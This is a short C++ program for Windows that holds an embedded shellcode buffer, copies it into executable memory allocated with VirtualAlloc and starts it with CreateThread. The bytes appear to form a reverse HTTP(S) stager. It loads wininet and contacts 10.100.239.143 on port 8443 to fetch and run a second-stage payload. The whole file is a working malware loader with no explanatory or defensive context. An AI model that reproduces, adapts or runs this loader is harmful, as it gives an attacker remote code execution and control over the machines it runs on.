#include <iostream>
#include <windows.h>

int main() {

    void* execute;
    HANDLE thread;

    unsigned char buf[] = 
"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52"
"\x48\x31\xd2\x51\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b"
"\x52\x20\x56\x48\x0f\xb7\x4a\x4a\x48\x8b\x72\x50\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0"
"\x41\x51\x66\x81\x78\x18\x0b\x02\x0f\x85\x72\x00\x00\x00\x8b"
"\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b"
"\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41"
"\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1"
"\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45"
"\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b"
"\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48"
"\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9"
"\x4b\xff\xff\xff\x5d\x48\x31\xdb\x53\x49\xbe\x77\x69\x6e\x69"
"\x6e\x65\x74\x00\x41\x56\x48\x89\xe1\x49\xc7\xc2\x4c\x77\x26"
"\x07\xff\xd5\x53\x53\x48\x89\xe1\x53\x5a\x4d\x31\xc0\x4d\x31"
"\xc9\x53\x53\x49\xba\x3a\x56\x79\xa7\x00\x00\x00\x00\xff\xd5"
"\xe8\x0f\x00\x00\x00\x31\x30\x2e\x31\x30\x30\x2e\x32\x33\x39"
"\x2e\x31\x34\x33\x00\x5a\x48\x89\xc1\x49\xc7\xc0\xfb\x20\x00"
"\x00\x4d\x31\xc9\x53\x53\x6a\x03\x53\x49\xba\x57\x89\x9f\xc6"
"\x00\x00\x00\x00\xff\xd5\xe8\xf0\x00\x00\x00\x2f\x78\x68\x69"
"\x79\x56\x70\x34\x43\x73\x6f\x35\x35\x5f\x48\x6a\x2d\x47\x77"
"\x59\x50\x6a\x41\x6f\x44\x38\x63\x31\x6d\x53\x35\x64\x6a\x63"
"\x4c\x37\x72\x56\x48\x38\x7a\x53\x4f\x4b\x6a\x5f\x34\x56\x6d"
"\x76\x58\x78\x4a\x49\x42\x4a\x6d\x32\x53\x78\x2d\x76\x4d\x6f"
"\x61\x2d\x6c\x33\x72\x6a\x6c\x4c\x52\x39\x73\x53\x6c\x31\x64"
"\x68\x6f\x6e\x34\x53\x48\x77\x61\x61\x42\x47\x4c\x53\x49\x51"
"\x42\x76\x67\x70\x55\x52\x54\x43\x66\x33\x58\x70\x4d\x6f\x31"
"\x6a\x6d\x49\x6a\x41\x45\x72\x4f\x67\x68\x45\x44\x4a\x77\x41"
"\x42\x39\x71\x59\x70\x62\x51\x5f\x44\x6f\x74\x6d\x43\x32\x42"
"\x36\x6b\x69\x4f\x46\x2d\x62\x4c\x35\x38\x70\x52\x37\x71\x30"
"\x33\x69\x66\x70\x33\x61\x30\x37\x70\x78\x4e\x75\x76\x5f\x77"
"\x53\x67\x36\x37\x4c\x58\x6d\x42\x57\x68\x64\x4f\x6e\x4b\x4a"
"\x43\x58\x5f\x45\x67\x45\x58\x4a\x75\x61\x57\x72\x7a\x4b\x66"
"\x68\x47\x30\x30\x6b\x4b\x78\x70\x79\x79\x48\x6f\x53\x73\x32"
"\x38\x34\x45\x4a\x77\x4b\x31\x5f\x4d\x41\x73\x58\x66\x31\x4a"
"\x32\x6a\x6f\x4e\x53\x54\x51\x6e\x77\x4c\x00\x48\x89\xc1\x53"
"\x5a\x41\x58\x4d\x31\xc9\x53\x48\xb8\x00\x02\x28\x84\x00\x00"
"\x00\x00\x50\x53\x53\x49\xc7\xc2\xeb\x55\x2e\x3b\xff\xd5\x48"
"\x89\xc6\x6a\x0a\x5f\x53\x5a\x48\x89\xf1\x4d\x31\xc9\x4d\x31"
"\xc9\x53\x53\x49\xc7\xc2\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x75"
"\x1f\x48\xc7\xc1\x88\x13\x00\x00\x49\xba\x44\xf0\x35\xe0\x00"
"\x00\x00\x00\xff\xd5\x48\xff\xcf\x74\x02\xeb\xcc\xe8\x55\x00"
"\x00\x00\x53\x59\x6a\x40\x5a\x49\x89\xd1\xc1\xe2\x10\x49\xc7"
"\xc0\x00\x10\x00\x00\x49\xba\x58\xa4\x53\xe5\x00\x00\x00\x00"
"\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda"
"\x49\xc7\xc0\x00\x20\x00\x00\x49\x89\xf9\x49\xba\x12\x96\x89"
"\xe2\x00\x00\x00\x00\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb2"
"\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd2\x58\xc3\x58\x6a\x00"
"\x59\x49\xc7\xc2\xf0\xb5\xa2\x56\xff\xd5";


    // get buffer length
    unsigned int buf_len = sizeof(buf);
    
    // allocate memory then move 
    execute = VirtualAlloc(0, buf_len, MEM_COMMIT | MEM_RESERVE, 0x40);
    RtlMoveMemory(execute, buf, buf_len);

    // execute memory
    thread = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)execute, 0, 0, 0);
    WaitForSingleObject(thread, INFINITE);


}

